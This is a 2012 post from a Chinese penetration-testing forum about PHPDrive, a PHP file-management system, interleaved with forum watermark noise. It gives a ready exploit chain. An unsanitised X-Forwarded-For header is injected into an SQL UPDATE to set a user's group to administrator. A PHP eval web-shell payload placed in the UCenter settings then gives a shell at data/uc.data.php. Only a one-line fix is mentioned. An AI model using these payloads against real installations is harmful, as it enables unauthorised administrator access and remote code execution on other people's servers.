中国网络渗透测试联盟
标题:
PHPDrive权限提升漏洞
[打印本页]
作者:
admin
时间:
2012-12-31 09:18
标题:
PHPDrive权限提升漏洞
PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等
! G9 B: C: V3 J9 {" _- b
! N+ B: a' n# V/ Q5 t2 S( f
includes/user.lib.php
" ^: e$ }' N6 R4 w- ~* m
行87
$ [! U5 G; \: k$ d
function get_ip() {
0 k" Y% m |! [. E( ?% ^9 b1 |
if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
1 W9 S! p. k" x' j; H
在用户注册与登录 处module/disk/account.lead.php
. L8 f% e7 V: H6 ~6 v/ d
198行
' C9 `% u0 C# b
//更新本次登录IP和时间
$ t- M% \4 K" P$ F! Y9 ^
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生
$ q3 W( n6 x% ^. a% D
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
. ^% V$ a5 D& G5 r! `7 e% R
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
0 ^ A: S d$ C- o/ e
后台getshell:
/ t( b4 R# Q3 r% A' R
在UCenter设置处,将UC数据库登录名填写为
' n* X, v: R* T" u
4 ]/ }6 {0 p3 ~5 f" V5 G1 @5 ~
root’);eval($_POST[DisKill]);?>/*
8 E# |$ b. d' |. O: R
可以得到一个shell,位置在 data/uc.data.php
0 V2 }0 H: e5 T% R* m }5 [
1 @7 k8 N2 e' A- u3 T7 ^
修复:过滤注入
8 F1 d5 m, d4 o$ p# x3 c2 j% e
5 v) E" H# ]0 m: `" m
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2